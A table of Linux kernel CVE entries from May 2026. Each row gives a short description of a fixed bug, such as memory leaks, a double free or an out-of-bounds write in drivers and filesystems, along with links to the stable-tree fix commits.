| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ipu6: Fix RPM reference leak in probe error paths Several error paths in ipu6_pci_probe() were jumping directly to out_ipu6_bus_del_devices without releasing the runtime PM reference. Add pm_runtime_put_sync() before cleaning up other resources. | 2026-05-06 | not yet calculated | CVE-2026-43177 | https://git.kernel.org/stable/c/fdc06d36dab7b28c2bdd16cb7ee4f25e0f55d9ac https://git.kernel.org/stable/c/364759ccc3fb49754758c585c530407f96683030 https://git.kernel.org/stable/c/3cd9e7539a3010a83391fecade1186cf30e616c9 https://git.kernel.org/stable/c/6099f78e4c9223f4de4169d2fd1cded01279da1a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix incorrect early exits for invalid metabox-enabled images Crafted EROFS images with metadata compression enabled can trigger incorrect early returns, leading to folio reference leaks. However, this does not cause system crashes or other severe issues. | 2026-05-06 | not yet calculated | CVE-2026-43179 | https://git.kernel.org/stable/c/041b5163bb9b2e81050bcd885b3373bf2f42d5f5 https://git.kernel.org/stable/c/56e4a84220045b6af0f1efc11825b39217c7decf https://git.kernel.org/stable/c/643575d5a4f24b23b0c54aa20aa74a4abed8ff5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: sysfs: fix chip removal with GPIOs exported over sysfs Currently if we export a GPIO over sysfs and unbind the parent GPIO controller, the exported attribute will remain under /sys/class/gpio because once we remove the parent device, we can no longer associate the descriptor with it in gpiod_unexport() and never drop the final reference. Rework the teardown code: provide an unlocked variant of gpiod_unexport() and remove all exported GPIOs with the sysfs_lock taken before unregistering the parent device itself. This is done to prevent any new exports happening before we unregister the device completely. | 2026-05-06 | not yet calculated | CVE-2026-43181 | https://git.kernel.org/stable/c/54f463494eb5bf193ef7d904a493474c451734df https://git.kernel.org/stable/c/a645cc25904b0baf508b77a0402ce151212b9800 https://git.kernel.org/stable/c/6766f59012301f1bf3f46c6e7149caca45d92309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ccs: Avoid possible division by zero Calculating maximum M for scaler configuration involves dividing by MIN_X_OUTPUT_SIZE limit register's value. Albeit the value is presumably non-zero, the driver was missing the check it in fact was. Fix this. | 2026-05-06 | not yet calculated | CVE-2026-43182 | https://git.kernel.org/stable/c/b6e0529c300e44153fc6f3b565e28163caf1f031 https://git.kernel.org/stable/c/9aae0f31d37a8facd25e37c0f0709ea08de83802 https://git.kernel.org/stable/c/c9af1818387f5c6f543e2e02c40b3038eae86be8 https://git.kernel.org/stable/c/32a21ed2ad743fe2d12af48e627089b921a032c2 https://git.kernel.org/stable/c/a8ff58cc8c7514c278ba0ea2c787d4bf9eeb355d https://git.kernel.org/stable/c/8ca7df18e7a58a0e5b0ed9eaaa34e16fc5cb9680 https://git.kernel.org/stable/c/679f0b7b6a409750a25754c8833e268e5fdde742 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: cx25821: Fix a resource leak in cx25821_dev_setup() Add release_mem_region() if ioremap() fails to release the memory region obtained by cx25821_get_resources(). | 2026-05-06 | not yet calculated | CVE-2026-43183 | https://git.kernel.org/stable/c/9f1c926248bde95a77ca104ab525467470607836 https://git.kernel.org/stable/c/071bfc6e723aabbbf08f0d439fb913cd01eb8de2 https://git.kernel.org/stable/c/f7759eb6738ee9fc296f6ab1705c6809947976f3 https://git.kernel.org/stable/c/4010e596d23cda6de65acb14f7fd4ce8289f1d49 https://git.kernel.org/stable/c/e220ec4c4596d634685b8a08d79ad876a720b466 https://git.kernel.org/stable/c/b7210170b10e2d17f7a4f6b9d39cc092442db860 https://git.kernel.org/stable/c/80ce3797dc99dae4ce8b939626b891c9eb85139f https://git.kernel.org/stable/c/68cd8ac994cac38a305200f638b30e13c690753b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: do not propagate page array emplacement errors as batch errors When fscrypt is enabled, move_dirty_folio_in_page_array() may fail because it needs to allocate bounce buffers to store the encrypted versions of each folio. Each folio beyond the first allocates its bounce buffer with GFP_NOWAIT. Failures are common (and expected) under this allocation mode; they should flush (not abort) the batch. However, ceph_process_folio_batch() uses the same `rc` variable for its own return code and for capturing the return codes of its routine calls; failing to reset `rc` back to 0 results in the error being propagated out to the main writeback loop, which cannot actually tolerate any errors here: once `ceph_wbc.pages` is allocated, it must be passed to ceph_submit_write() to be freed. If it survives until the next iteration (e.g. due to the goto being followed), ceph_allocate_page_array()'s BUG_ON() will oops the worker. Note that this failure mode is currently masked due to another bug (addressed next in this series) that prevents multiple encrypted folios from being selected for the same write. For now, just reset `rc` when redirtying the folio to prevent errors in move_dirty_folio_in_page_array() from propagating. Note that move_dirty_folio_in_page_array() is careful never to return errors on the first folio, so there is no need to check for that. After this change, ceph_process_folio_batch() no longer returns errors; its only remaining failure indicator is `locked_pages == 0`, which the caller already handles correctly. | 2026-05-06 | not yet calculated | CVE-2026-43188 | https://git.kernel.org/stable/c/746840c87d76b614b14d9337c466ff022fc49823 https://git.kernel.org/stable/c/4c0d84c788d89c167abf0bf84fd37890c4c84f08 https://git.kernel.org/stable/c/707104682e3c163f7c14cdd6b07a3e95fb374759 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: v4l2-async: Fix error handling on steps after finding a match Once an async connection is found to be matching with an fwnode, a sub-device may be registered (in case it wasn't already), its bound operation is called, ancillary links are created, the async connection is added to the sub-device's list of connections and removed from the global waiting connection list. Further on, the sub-device's possible own notifier is searched for possible additional matches. Fix these specific issues: - If v4l2_async_match_notify() failed before the sub-notifier handling, the async connection was unbound and its entry removed from the sub-device's async connection list. The latter part was also done in v4l2_async_match_notify(). - The async connection's sd field was only set after creating ancillary links in v4l2_async_match_notify(). It was however dereferenced in v4l2_async_unbind_subdev_one(), which was called on error path of v4l2_async_match_notify() failure. | 2026-05-06 | not yet calculated | CVE-2026-43189 | https://git.kernel.org/stable/c/30aaed311f973f13ba13a0cd2dc0202f595fff48 https://git.kernel.org/stable/c/461733d83e67ba7e3a5b750c0d203f738e01244f https://git.kernel.org/stable/c/b02bcb378efa8af07827f49b3afcc5e825318c55 https://git.kernel.org/stable/c/2de0a3c8148fc3dbea21981e6569f550b3626119 https://git.kernel.org/stable/c/7345d6d356336c448d6b9230ed8704f39679fd12 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Adjust PHY FSM transition to TX_EN-to-PLL_ON for TMDS on DCN35 [Why] A backport of the change made for DCN401 that addresses an issue where we turn off the PHY PLL when disabling TMDS output, which causes the OTG to remain stuck. The OTG being stuck can lead to a hang in the DCHVM's ability to ACK invalidations when it thinks the HUBP is still on but it's not receiving global sync. The transition to PLL_ON needs to be atomic as there's no guarantee that the thread isn't pre-empted or is able to complete before the IOMMU watchdog times out. [How] Backport the implementation from dcn401 back to dcn35. There's a functional difference in when the eDP output is disabled in dcn401 code so we don't want to utilize it directly. | 2026-05-06 | not yet calculated | CVE-2026-43191 | https://git.kernel.org/stable/c/d1f7ceb00e8956ff6d183b7b45ef4e73c96f4c51 https://git.kernel.org/stable/c/75372d75a4e23783583998ed99d5009d555850da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm mpath: Add missing dm_put_device when failing to get scsi dh name When commit fd81bc5cca8f ("scsi: device_handler: Return error pointer in scsi_dh_attached_handler_name()") added code to fail parsing the path if scsi_dh_attached_handler_name() failed with -ENOMEM, it didn't clean up the reference to the path device that had just been taken. Fix this, and steamline the error paths of parse_path() a little. | 2026-05-06 | not yet calculated | CVE-2026-43192 | https://git.kernel.org/stable/c/4aa5c37b7d8019f7296111c1add00e7214baae60 https://git.kernel.org/stable/c/787bd63ee661b0148ce8e1fde92b7afddd85c446 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: fix nfs4_file refcount leak in nfsd_get_dir_deleg() Claude pointed out that there is a nfs4_file refcount leak in nfsd_get_dir_deleg(). Ensure that the reference to "fp" is released before returning. | 2026-05-06 | not yet calculated | CVE-2026-43193 | https://git.kernel.org/stable/c/0d8362e15aad5b5c1d6a65bb23ac6c45ccf881f3 https://git.kernel.org/stable/c/789477b849394afdb60507924d65f7ef18f078ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate user queue size constraints Add validation to ensure user queue sizes meet hardware requirements: - Size must be a power of two for efficient ring buffer wrapping - Size must be at least AMDGPU_GPU_PAGE_SIZE to prevent undersized allocations This prevents invalid configurations that could lead to GPU faults or unexpected behavior. | 2026-05-06 | not yet calculated | CVE-2026-43195 | https://git.kernel.org/stable/c/cf2a37be899dc1b01f53bf1d0157330eaf3e3f55 https://git.kernel.org/stable/c/9f6cc309cd15922fe58cab2dfa1b5993ad31dec7 https://git.kernel.org/stable/c/8079b87c02e531cc91601f72ea8336dd2262fdf1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: ti: pruss: Fix double free in pruss_clk_mux_setup() In the pruss_clk_mux_setup(), the devm_add_action_or_reset() indirectly calls pruss_of_free_clk_provider(), which calls of_node_put(clk_mux_np) on the error path. However, after the devm_add_action_or_reset() returns, the of_node_put(clk_mux_np) is called again, causing a double free. Fix by returning directly, to avoid the duplicate of_node_put(). | 2026-05-06 | not yet calculated | CVE-2026-43196 | https://git.kernel.org/stable/c/dbda01bf2dfe5af33163e1e5fca1b82b619c2803 https://git.kernel.org/stable/c/24c40076e3bc3d73c839c886d6bda1da6c4d9b93 https://git.kernel.org/stable/c/818cf66d91c8ef09b01664a12d5f4ea786d64396 https://git.kernel.org/stable/c/e113339cc7d23be4948891f3a702e9dce5b47035 https://git.kernel.org/stable/c/69aa67c1e22d13e9aad4b08c86304ad8e743dcab https://git.kernel.org/stable/c/b7db9953c2f8da37de498198623b05b46f8e2ca0 https://git.kernel.org/stable/c/04dbbb18cc9c8795c9ff47d8994bc03ebfef9d68 https://git.kernel.org/stable/c/80db65d4acfb9ff12d00172aed39ea8b98261aad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: Fix swapped parameters in pci_{primary/secondary}_epc_epf_unlink() functions struct configfs_item_operations callbacks are defined like the following: int (*allow_link)(struct config_item *src, struct config_item *target); void (*drop_link)(struct config_item *src, struct config_item *target); While pci_primary_epc_epf_link() and pci_secondary_epc_epf_link() specify the parameters in the correct order, pci_primary_epc_epf_unlink() and pci_secondary_epc_epf_unlink() specify the parameters in the wrong order, leading to the below kernel crash when using the unlink command in configfs: Unable to handle kernel paging request at virtual address 0000000300000857 Mem abort info: ... pc : string+0x54/0x14c lr : vsnprintf+0x280/0x6e8 ... string+0x54/0x14c vsnprintf+0x280/0x6e8 vprintk_default+0x38/0x4c vprintk+0xc4/0xe0 pci_epf_unbind+0xdc/0x108 configfs_unlink+0xe0/0x208+0x44/0x74 vfs_unlink+0x120/0x29c __arm64_sys_unlinkat+0x3c/0x90 invoke_syscall+0x48/0x134 do_el0_svc+0x1c/0x30prop.0+0xd0/0xf0 [mani: cced stable, changed commit message as per https://lore.kernel.org/linux-pci/aV9joi3jF1R6ca02@ryzen] | 2026-05-06 | not yet calculated | CVE-2026-43200 | https://git.kernel.org/stable/c/58686bf62cb38b92e4b28408162a5703775b4d12 https://git.kernel.org/stable/c/1c96c1acef4b4a1108fc13f84a8ac0b0633bbb46 https://git.kernel.org/stable/c/142b1bba3299264b76ed8ef53cd93b2b2af65d6c https://git.kernel.org/stable/c/339191811e6fc4559c4008c5af7a91b05086d596 https://git.kernel.org/stable/c/733cbc3aa97e71cc70847e75c925b364cc9b04a6 https://git.kernel.org/stable/c/aefc0e0bd20f54abe3b501b8798c0be656af272b https://git.kernel.org/stable/c/8754dd7639ab0fd68c3ab9d91c7bdecc3e5740a8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: APEI/GHES: ARM processor Error: don't go past allocated memory If the BIOS generates a very small ARM Processor Error, or an incomplete one, the current logic will fail to deferrence err->section_length and ctx_info->size Add checks to avoid that. With such changes, such GHESv2 records won't cause OOPSes like this: [ 1.492129] Internal error: Oops: 0000000096000005 [#1] SMP [ 1.495449] Modules linked in: [ 1.495820] CPU: 0 UID: 0 PID: 9 Comm: kworker/0:0 Not tainted 6.18.0-rc1-00017-gabadcc3553dd-dirty #18 PREEMPT [ 1.496125] Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 02/02/2022 [ 1.496433] Workqueue: kacpi_notify acpi_os_execute_deferred [ 1.496967] pstate: 814000c5 (Nzcv daIF +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 1.497199] pc : log_arm_hw_error+0x5c/0x200 [ 1.497380] lr : ghes_handle_arm_hw_error+0x94/0x220 0xffff8000811c5324 is in log_arm_hw_error (../drivers/ras/ras.c:75). 70 err_info = (struct cper_arm_err_info *)(err + 1); 71 ctx_info = (struct cper_arm_ctx_info *)(err_info + err->err_info_num); 72 ctx_err = (u8 *)ctx_info; 73 74 for (n = 0; n < err->context_info_num; n++) { 75 sz = sizeof(struct cper_arm_ctx_info) + ctx_info->size; 76 ctx_info = (struct cper_arm_ctx_info *)((long)ctx_info + sz); 77 ctx_len += sz; 78 } 79 and similar ones while trying to access section_length on an error dump with too small size. [ rjw: Subject tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43201 | https://git.kernel.org/stable/c/242c652849d979d0133c315a42d9acea0ff88390 https://git.kernel.org/stable/c/136093ba4161e0080088abff48273f6830a47766 https://git.kernel.org/stable/c/db103b8bd3a4aca69b1b5fe8831a6ed75ac4b3bd https://git.kernel.org/stable/c/87880af2d24e62a84ed19943dbdd524f097172f2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: vt8500lcdfb: fix missing dma_free_coherent() fbi->fb.screen_buffer is allocated with dma_alloc_coherent() but is not freed if the error path is reached. | 2026-05-06 | not yet calculated | CVE-2026-43202 | https://git.kernel.org/stable/c/9a9bc60ed372aaae9784ff8ad8e5f496ff15fd31 https://git.kernel.org/stable/c/9c3873cccb3fab54cde0605ae7093d332c99073e https://git.kernel.org/stable/c/778f31be5b8c10024db23fdd8a05f68a02311008 https://git.kernel.org/stable/c/e8c5d5f6cd66e032f9aefdcc21b0c34761aef78a https://git.kernel.org/stable/c/f47d5b9e8aa6178a0aaf225119ad1ec7d3f49876 https://git.kernel.org/stable/c/40c1ff25025150ff6d7ec7ad441fcfd6d070ee76 https://git.kernel.org/stable/c/2cd2f988a8bd2da227f5c3cfa0cbf3a9a287ddc3 https://git.kernel.org/stable/c/88b3b9924337336a31cefbe99a22ed09401be74a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: qcom: q6asm: drop DSP responses for closed data streams 'Commit a354f030dbce ("ASoC: qcom: q6asm: handle the responses after closing")' attempted to ignore DSP responses arriving after a stream had been closed. However, those responses were still handled, causing lockups. Fix this by unconditionally dropping all DSP responses associated with closed data streams. | 2026-05-06 | not yet calculated | CVE-2026-43204 | https://git.kernel.org/stable/c/3249251eac6081d5169ba09f2d9cca66ab0cab0d https://git.kernel.org/stable/c/8a066a81ee0c1b6cdbd81393536c3b2d19ccef25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dpaa2-switch: validate num_ifs to prevent out-of-bounds write The driver obtains sw_attr.num_ifs from firmware via dpsw_get_attributes() but never validates it against DPSW_MAX_IF (64). This value controls iteration in dpaa2_switch_fdb_get_flood_cfg(), which writes port indices into the fixed-size cfg->if_id[DPSW_MAX_IF] array. When firmware reports num_ifs >= 64, the loop can write past the array bounds. Add a bound check for num_ifs in dpaa2_switch_init(). dpaa2_switch_fdb_get_flood_cfg() appends the control interface (port num_ifs) after all matched ports. When num_ifs == DPSW_MAX_IF and all ports match the flood filter, the loop fills all 64 slots and the control interface write overflows by one entry. The check uses >= because num_ifs == DPSW_MAX_IF is also functionally broken. build_if_id_bitmap() silently drops any ID >= 64: if (id[i] < DPSW_MAX_IF) bmap[id[i] / 64] |= ... | 2026-05-06 | not yet calculated | CVE-2026-43205 | https://git.kernel.org/stable/c/a26dda3bae469c8e4e1b1993ad33dafa32d0fc28 https://git.kernel.org/stable/c/a3034a8d56174dd6464c46823438f25797910a8d https://git.kernel.org/stable/c/b690635d4719214892855b79ce018d4b1672ac96 https://git.kernel.org/stable/c/8b841fd529db9faf8bc678d429d4bf4e98b10900 https://git.kernel.org/stable/c/89764cf44544e943230f5e03b8c40a90da26537c https://git.kernel.org/stable/c/c18493f750208eb4ff1198fc5a02786b8b2d70a6 https://git.kernel.org/stable/c/8a5752c6dcc085a3bfc78589925182e4e98468c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: minix: Add required sanity checking to minix_check_superblock() The fs/minix implementation of the minix filesystem does not currently support any other value for s_log_zone_size than 0. This is also the only value supported in util-linux; see mkfs.minix.c line 511. In addition, this patch adds some sanity checking for the other minix superblock fields, and moves the minix_blocks_needed() checks for the zmap and imap also to minix_check_super_block(). This also closes a related syzbot bug report. | 2026-05-06 | not yet calculated | CVE-2026-43209 | https://git.kernel.org/stable/c/a051ecf5c5b0387840dc210413ed3bc7fbdaa69c https://git.kernel.org/stable/c/d791c544efd6b9c944b43cf7f502e5bcb02fb941 https://git.kernel.org/stable/c/66c7c239c65341f99ae388d4d53dc9df2bcb9925 https://git.kernel.org/stable/c/2bb588cede1c1969e49c0a2822c8cb8b346b7682 https://git.kernel.org/stable/c/f57ccd4657c7f082dc47e5b9e18a883bb5f9118f https://git.kernel.org/stable/c/31fefc18096cdc5549cfa54964d90e0b3229aedc https://git.kernel.org/stable/c/1efc128ee4adbc23e082715425ff895449d233bc https://git.kernel.org/stable/c/8c97a6ddc95690a938ded44b4e3202f03f15078c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: ring-buffer: Fix to check event length before using Check the event length before adding it for accessing next index in rb_read_data_buffer(). Since this function is used for validating possibly broken ring buffers, the length of the event could be broken. In that case, the new event (e + len) can point a wrong address. To avoid invalid memory access at boot, check whether the length of each event is in the possible range before using it. | 2026-05-06 | not yet calculated | CVE-2026-43210 | https://git.kernel.org/stable/c/b4700c089a10f89de3a5149d57f8a58306458982 https://git.kernel.org/stable/c/5026010110a5ad2268d8c23e1e286ab7c736f7ac https://git.kernel.org/stable/c/9eb80e54494ef1efef8a64bec4ffa672c9cf411e https://git.kernel.org/stable/c/912b0ee248c529a4f45d1e7f568dc1adddbf2a4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: Drop the lock in skb_may_tx_timestamp() skb_may_tx_timestamp() may acquire sock::sk_callback_lock. The lock must not be taken in IRQ context, only softirq is okay. A few drivers receive the timestamp via a dedicated interrupt and complete the TX timestamp from that handler. This will lead to a deadlock if the lock is already write-locked on the same CPU. Taking the lock can be avoided. The socket (pointed by the skb) will remain valid until the skb is released. The ->sk_socket and ->file member will be set to NULL once the user closes the socket which may happen before the timestamp arrives. If we happen to observe the pointer while the socket is closing but before the pointer is set to NULL then we may use it because both pointer (and the file's cred member) are RCU freed. Drop the lock. Use READ_ONCE() to obtain the individual pointer. Add a matching WRITE_ONCE() where the pointer are cleared. | 2026-05-06 | not yet calculated | CVE-2026-43216 | https://git.kernel.org/stable/c/f3e4cceafad27c9363c33622732f86722846ec6f https://git.kernel.org/stable/c/e4c6efb3b70ff87f1df99efce2f8893717695718 https://git.kernel.org/stable/c/983512f3a87fd8dc4c94dfa6b596b6e57df5aad7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: gen2: Add sanity check for session stop In iris_kill_session, inst->state is set to IRIS_INST_ERROR and session_close is executed, which will kfree(inst_hfi_gen2->packet). If stop_streaming is called afterward, it will cause a crash. Add a NULL check for inst_hfi_gen2->packet before sendling STOP packet to firmware to fix that. | 2026-05-06 | not yet calculated | CVE-2026-43217 | https://git.kernel.org/stable/c/72846441c5f6396de9face04e77fa3d28e9915b6 https://git.kernel.org/stable/c/75992ba43072674fd4767df62a1fe2048565cc60 https://git.kernel.org/stable/c/9aa8d63d09cfc44d879427cc5ba308012ca4ab8e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c/tw9903: Fix potential memory leak in tw9903_probe() In one of the error paths in tw9903_probe(), the memory allocated in v4l2_ctrl_handler_init() and v4l2_ctrl_new_std() is not freed. Fix that by calling v4l2_ctrl_handler_free() on the handler in that error path. | 2026-05-06 | not yet calculated | CVE-2026-43218 | https://git.kernel.org/stable/c/e54aa17c968c4de2c5f7b7ea390c63d33c07513b https://git.kernel.org/stable/c/32f0493506313775d3bd448de34762b6538da6bd https://git.kernel.org/stable/c/92537a15780b6d0281fd8286f93fbc3652e35f48 https://git.kernel.org/stable/c/9cb9eca33d20316ed3c7a938793b8735ac3e128b https://git.kernel.org/stable/c/a114918270f0d95c607d69b03a244e6afe54813f https://git.kernel.org/stable/c/cc7aeed33e4f55c76f35f0fca73e4dfe12a63a3a https://git.kernel.org/stable/c/add02a3fb1fd71b004f0ed824cbac00f850de558 https://git.kernel.org/stable/c/9cea16fea47e5553f51d10957677ff735b1eff03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: cpsw_new: Fix potential unregister of netdev that has not been registered yet If an error occurs during register_netdev() for the first MAC in cpsw_register_ports(), even though cpsw->slaves[0].ndev is set to NULL, cpsw->slaves[1].ndev would remain unchanged. This could later cause cpsw_unregister_ports() to attempt unregistering the second MAC. To address this, add a check for ndev->reg_state before calling unregister_netdev(). With this change, setting cpsw->slaves[i].ndev to NULL becomes unnecessary and can be removed accordingly. | 2026-05-06 | not yet calculated | CVE-2026-43219 | https://git.kernel.org/stable/c/29739ec197ed66535bc0b86f14ab66c5f4512138 https://git.kernel.org/stable/c/349c4cac6f54a81fc107589771f88136a2b20415 https://git.kernel.org/stable/c/9d724b34fbe13b71865ad0906a4be97571f19cf5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: serialize sequence allocation under concurrent TLB invalidations With concurrent TLB invalidations, completion wait randomly gets timed out because cmd_sem_val was incremented outside the IOMMU spinlock, allowing CMD_COMPL_WAIT commands to be queued out of sequence and breaking the ordering assumption in wait_on_sem(). Move the cmd_sem_val increment under iommu->lock so completion sequence allocation is serialized with command queuing. And remove the unnecessary return. | 2026-05-06 | not yet calculated | CVE-2026-43220 | https://git.kernel.org/stable/c/5000ce7fcb31067566a1a1a2e5b5bbff93625242 https://git.kernel.org/stable/c/48caa7542a795c9679ec1bd1bc2592e05a7369a4 https://git.kernel.org/stable/c/9e249c48412828e807afddc21527eb734dc9bd3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: ipmb: initialise event handler read bytes IPMB doesn't use i2c reads, but the handler needs to set a value. Otherwise an i2c read will return an uninitialised value from the bus driver. | 2026-05-06 | not yet calculated | CVE-2026-43221 | https://git.kernel.org/stable/c/905554ebd76aeee370bfd5136ea11e0b9d75c6f1 https://git.kernel.org/stable/c/56d5c0557e53c4d8d92a619fa83eaae178165e07 https://git.kernel.org/stable/c/2dfbc8c17dd161885336e77e71c336cd62cf6748 https://git.kernel.org/stable/c/f726b3a57e00bb6249c67714c11ae8b4b31719a1 https://git.kernel.org/stable/c/102712417bb6aa9a00d852bc59cb0a276db486c4 https://git.kernel.org/stable/c/9f235ccecd03c436cb1683eac16b12f119e54aa9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: pvrusb2: fix URB leak in pvr2_send_request_ex When pvr2_send_request_ex() submits a write URB successfully but fails to submit the read URB (e.g. returns -ENOMEM), it returns immediately without waiting for the write URB to complete. Since the driver reuses the same URB structure, a subsequent call to pvr2_send_request_ex() attempts to submit the still-active write URB, triggering a 'URB submitted while active' warning in usb_submit_urb(). Fix this by ensuring the write URB is unlinked and waited upon if the read URB submission fails. | 2026-05-06 | not yet calculated | CVE-2026-43223 | https://git.kernel.org/stable/c/da524c939b1e5ba17f10db4bde4bdaf569ffcda6 https://git.kernel.org/stable/c/cf459d6ffa5e150ef3744b897f936ff24b52bd15 https://git.kernel.org/stable/c/77a63f8efc434ddb04667ed632aade58301a2f13 https://git.kernel.org/stable/c/4ba5c7a1aade7090172cbffd4d120bf4cf5ccbde https://git.kernel.org/stable/c/58dd722b6c3debcddb4684fb256c90fee7f063e5 https://git.kernel.org/stable/c/2011929f0e4cf6a0a34dd6205911b12276904453 https://git.kernel.org/stable/c/5f3ac816861c3b8a5d1a3645b17dc3a99d668d94 https://git.kernel.org/stable/c/a8333c8262aed2aedf608c18edd39cf5342680a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix sgtable leak on mapping failures In an unlikely case when io_populate_area_dma() fails, which could only happen on a PAGE_POOL_32BIT_ARCH_WITH_64BIT_DMA machine, io_zcrx_map_area() will have an initialised and not freed table. It was supposed to be cleaned up in the error path, but !is_mapped prevents that. | 2026-05-06 | not yet calculated | CVE-2026-43224 | https://git.kernel.org/stable/c/f1ae403324311e143ef20e53cf9a5f01e312f7c9 https://git.kernel.org/stable/c/ef075c1464ac9047e2cf7d23cb020bfd0b8e4b60 https://git.kernel.org/stable/c/a983aae397767e9da931128ff2b5bf9066513ce3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix memory leak on failure path cfg80211_inform_bss_frame() may return NULL on failure. In that case, the allocated buffer 'buf' is not freed and the function returns early, leading to potential memory leak. Fix this by ensuring that 'buf' is freed on both success and failure paths. | 2026-05-06 | not yet calculated | CVE-2026-43225 | https://git.kernel.org/stable/c/9874e33ce52ba449ab0ade78752a2d37a2294617 https://git.kernel.org/stable/c/a968c6a39607c129b8ac2c3c2a5e8923574e90d0 https://git.kernel.org/stable/c/8311bb40698ba027649d5d1ca84ad4bf25270546 https://git.kernel.org/stable/c/9f70f78e22b321429afc77befecedf05543d4e2c https://git.kernel.org/stable/c/af48c1a0abe849e167fc754b6c260b6d8350b6fd https://git.kernel.org/stable/c/017295b17bf1f477246c95bd253a7ef0cb4684c9 https://git.kernel.org/stable/c/abe850d82c8cb72d28700673678724e779b1826e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clocksource/drivers/sh_tmu: Always leave device running after probe The TMU device can be used as both a clocksource and a clockevent provider. The driver tries to be smart and power itself on and off, as well as enabling and disabling its clock when it's not in operation. This behavior is slightly altered if the TMU is used as an early platform device in which case the device is left powered on after probe, but the clock is still enabled and disabled at runtime. This has worked for a long time, but recent improvements in PREEMPT_RT and PROVE_LOCKING have highlighted an issue. As the TMU registers itself as a clockevent provider, clockevents_register_device(), it needs to use raw spinlocks internally as this is the context of which the clockevent framework interacts with the TMU driver. However in the context of holding a raw spinlock the TMU driver can't really manage its power state or clock with calls to pm_runtime_*() and clk_*() as these calls end up in other platform drivers using regular spinlocks to control power and clocks. This mix of spinlock contexts trips a lockdep warning. ============================= [ BUG: Invalid wait context ] 6.18.0-arm64-renesas-09926-gee959e7c5e34 #1 Not tainted ----------------------------- swapper/0/0 is trying to lock: ffff000008c9e180 (&dev->power.lock){-...}-{3:3}, at: __pm_runtime_resume+0x38/0x88 other info that might help us debug this: context-{5:5} 1 lock held by swapper/0/0: ccree e6601000.crypto: ARM CryptoCell 630P Driver: HW version 0xAF400001/0xDCC63000, Driver version 5.0 #0: ffff8000817ec298 ccree e6601000.crypto: ARM ccree device initialized (tick_broadcast_lock){-...}-{2:2}, at: __tick_broadcast_oneshot_control+0xa4/0x3a8 stack backtrace: CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.18.0-arm64-renesas-09926-gee959e7c5e34 #1 PREEMPT Hardware name: Renesas Salvator-X 2nd version board based on r8a77965 (DT) Call trace: show_stack+0x14/0x1c (C) dump_stack_lvl+0x6c/0x90 dump_stack+0x14/0x1c __lock_acquire+0x904/0x1584 lock_acquire+0x220/0x34c _raw_spin_lock_irqsave+0x58/0x80 __pm_runtime_resume+0x38/0x88 sh_tmu_clock_event_set_oneshot+0x84/0xd4 clockevents_switch_state+0xfc/0x13c tick_broadcast_set_event+0x30/0xa4 __tick_broadcast_oneshot_control+0x1e0/0x3a8 tick_broadcast_oneshot_control+0x30/0x40 cpuidle_enter_state+0x40c/0x680 cpuidle_enter+0x30/0x40 do_idle+0x1f4/0x280 cpu_startup_entry+0x34/0x40 kernel_init+0x0/0x130 do_one_initcall+0x0/0x230 __primary_switched+0x88/0x90 For non-PREEMPT_RT builds this is not really an issue, but for PREEMPT_RT builds where normal spinlocks can sleep this might be an issue. Be cautious and always leave the power and clock running after probe. | 2026-05-06 | not yet calculated | CVE-2026-43227 | https://git.kernel.org/stable/c/79d650695773f03de36b99228a090d33d1c18264 https://git.kernel.org/stable/c/f0b31247e7d67a943b3a09d3cef7c0ae788d88e6 https://git.kernel.org/stable/c/016476afef993d1201a19decc9b5b2ea1e6620f2 https://git.kernel.org/stable/c/6f113ab549b864c1bc57d4f89846ee335394089a https://git.kernel.org/stable/c/88c76792180dffd83f1c5b9dc8fdaeb145cb94e0 https://git.kernel.org/stable/c/bc59d5f3afe41fec5d673c27c703b761ae578d28 https://git.kernel.org/stable/c/0e513cc6b9cea190fe342cc222b1054e7e8acfc8 https://git.kernel.org/stable/c/b1278972b08e480990e2789bdc6a7c918bc349be |
